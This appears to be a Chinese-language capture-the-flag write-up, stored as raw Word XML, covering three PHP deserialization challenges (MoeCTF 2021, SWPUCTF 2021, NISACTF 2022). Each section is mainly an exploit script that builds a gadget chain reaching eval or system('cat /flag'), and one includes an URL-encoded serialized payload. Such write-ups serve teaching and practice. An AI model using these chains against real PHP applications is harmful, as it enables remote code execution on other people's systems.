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B2E9" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>[MoeCTF 2021]unserialize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="301C60EC" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r w:rsidRPr="005F1748">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BC163F4" wp14:editId="052467B4">
            <wp:extent cx="5274310" cy="6888480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1261160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0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1420" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接写exp：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C73FA05" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t>&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084B8F53" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F"/>
    <w:p w14:paraId="55C62038" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t>class entrance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCEDF9C" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1765204B" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">    public $start;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D948EB4" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F"/>
    <w:p w14:paraId="67333E5E" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F"/>
    <w:p w14:paraId="33EC9815" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">    function __destruct()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169321BE" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25822DC6" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">        $this-&gt;start-&gt;helloworld();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E22BDCE" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D83624" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A1E6A9" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F"/>
    <w:p w14:paraId="081AA43C" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t>class springboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011B462D" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5FDE8E" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">    public $middle;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE99587" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F"/>
    <w:p w14:paraId="321A13E7" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">    function __call($name, $arguments)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7A5B6D" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A121FE7" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">        echo $this-&gt;middle-&gt;hs;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345EC510" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BAB468" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA7B919" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F"/>
    <w:p w14:paraId="2074BA38" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t>class evil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3918AA6B" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024EADEE" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">    public $end;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F733BE2" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F"/>
    <w:p w14:paraId="22CD1E54" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">    function __construct($end)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32114319" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B47F3F7" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">        $this-&gt;end = $end;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72673B6B" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5F7F43" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F"/>
    <w:p w14:paraId="53A2363C" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">    function __get($Attribute)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1107703F" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6569C932" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">        eval($this-&gt;end);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265878BA" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1C5130" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78635B34" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F"/>
    <w:p w14:paraId="16AEBFA5" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t>$o = new entrance;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FAEA31" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t>$o-&gt;start = new springboard;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF73E0E" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t>$o-&gt;start-&gt;middle = new evil("system('cat /flag');");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14147A47" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t>echo serialize($o);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A3AB70" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F4E9FD" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F"/>
    <w:p w14:paraId="57F72172" w14:textId="77777777" w:rsidR="00EC54AB" w:rsidRDefault="00EC54AB"/>
    <w:p w14:paraId="60BD83F5" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>[SWPUCTF 2021 新生赛]pop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617C25BE" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r w:rsidRPr="005361B7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ACF1B1E" wp14:editId="26504470">
            <wp:extent cx="5274310" cy="5765165"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="1147730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3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DEC2" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现是反序列化链</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2EB887" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现w</w:t>
      </w:r>
      <w:r>
        <w:t>22m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中有$</w:t>
      </w:r>
      <w:r>
        <w:t>w00m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是入口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5769FD37" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18240FA8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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A79705B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D8221B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class w44m{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A157DB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B40B35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 xml:space="preserve">    private $admin = 'w44m';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071EAEE6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 xml:space="preserve">    protected $passwd = '08067';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2866D6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FE078F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74B2A5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F63889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class w22m{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE3BC62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 xml:space="preserve">    public $w00m;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BEC290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2E3AC250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3D5327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class w33m{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EABBBB7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 xml:space="preserve">    public $w00m;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4D05F6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 xml:space="preserve">    public $w22m;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEAAE32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298982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08D15CB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# w22m.__destruct().w00m-&gt;w33m.__toString().w00m-&gt;w44m.Getflag()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F89F737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$a = new w22m();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADDFD88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$b = new w33m();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51540A52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$c = new w44m();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201CC34F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# 入口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7D672C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$a-&gt;w00m=$b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07EBC2AD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# 链子</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A982975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$b-&gt;w00m=$c;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7B59B3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$b-&gt;w22m='Getflag';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292D0CF5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echo urlencode(serialize($a));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4056E02E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1B7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE321FF" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRPr="005361B7" w:rsidRDefault="00254F1F" w:rsidP="00254F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9C12F3" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得出url后的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298FA98E" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r w:rsidRPr="005361B7">
        <w:t>O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076865AF" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F">
      <w:r>
        <w:t>G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>et一下拿到flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B11ADC9" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F"/>
    <w:p w14:paraId="0044CF3E" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F" w:rsidP="00254F1F"/>
    <w:p w14:paraId="2E1EC986" w14:textId="77777777" w:rsidR="00D17668" w:rsidRDefault="00D17668" w:rsidP="00D17668">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="42"/>
          <w:szCs w:val="42"/>
        </w:rPr>
        <w:t>[NISACTF 2022]babyserialize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E25F2B1" w14:textId="77777777" w:rsidR="00D17668" w:rsidRDefault="00D17668" w:rsidP="00D17668">
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xp</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DC6869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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629E6493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class NISA{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718552D6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$fun;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C7CA1D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$txw4ever='System("cat /fllllllaaag");';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A18370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function __wakeup()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003C55C7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25B370F6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if($this-&gt;fun=="show_me_flag"){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700153A6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    hint();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF2FE10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6E09A844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3892DAC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A9C16D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function __call($from,$val){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6E574D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$this-&gt;fun=$val[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6318039B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B4F3AF6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5A731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function __toString()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3BC2A4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18A6DE21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echo $this-&gt;fun;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A45594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return " ";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F73F472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E757F8C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function __invoke()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAAF84C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26045EAB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checkcheck($this-&gt;txw4ever);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B07E8C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@eval($this-&gt;txw4ever);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF36BB8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E7847C9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766D0F9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6BA9F6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class TianXiWei{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1364237A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$ext;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B1C263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$x;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557AF2E1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function __wakeup()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C4944D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587A43C2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$this-&gt;ext-&gt;nisa($this-&gt;x);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658657FE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DEAA867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E4B5E4B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6D4C39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class Ilovetxw{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5811EC8A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$huang;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AC4F10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$su;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6761E5FD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C0F832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function __call($fun1,$arg){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FE7579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$this-&gt;huang-&gt;fun=$arg[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06ED7E99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01E6CAD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3C126D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function __toString(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9B9074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$bb = $this-&gt;su;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1401761B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return $bb();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171C939F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E57FBE0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66944B" w14:textId="77777777" w:rsidR="00D17668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53EBDF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08C8FB2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class four{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7176A8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$a="TXW4EVER";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE1E074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private $fun='abc';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166C7851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507B6A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public function __set($name, $value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9B6FFE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52243EFC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$this-&gt;$name=$value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53912FF9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if ($this-&gt;fun = "sixsixsix"){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EA48EA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    strtolower($this-&gt;a);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFBEA3C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455E699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E7C5D83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1C53F1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$t=new TianXiWei();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCD0703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$t-&gt;ext=new Ilovetxw();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D92DC59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$t-&gt;ext-&gt;huang=new four();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161C2F81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$t-&gt;ext-&gt;huang-&gt;a=new Ilovetxw();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5257344A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$t-&gt;ext-&gt;huang-&gt;a-&gt;su=new NiSA();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767DDF35" w14:textId="77777777" w:rsidR="00D17668" w:rsidRPr="00D73444" w:rsidRDefault="00D17668" w:rsidP="00D17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444">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>echo urlencode(serialize($t));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7067FF64" w14:textId="77777777" w:rsidR="00254F1F" w:rsidRDefault="00254F1F"/>
    <w:sectPr w:rsidR="0025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4276" w14:textId="77777777" w:rsidR="00C642F1" w:rsidRDefault="00C642F1" w:rsidP="00254F1F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2A107A1E" w14:textId="77777777" w:rsidR="00C642F1" w:rsidRDefault="00C642F1" w:rsidP="0025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376A" w14:textId="77777777" w:rsidR="00C642F1" w:rsidRDefault="00C642F1" w:rsidP="00254F1F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4C2046C1" w14:textId="77777777" w:rsidR="00C642F1" w:rsidRDefault="00C642F1" w:rsidP="00254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4F"/>
    <w:rsid w:val="00254F1F"/>
    <w:rsid w:val="00C642F1"/>
    <w:rsid w:val="00CA094F"/>
    <w:rsid w:val="00D17668"/>
    <w:rsid w:val="00EC54AB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1097D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{368E416D-5BAB-41F3-A85D-AE3A44CA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F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F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某</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>某 王</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-08T15:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-10T16:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>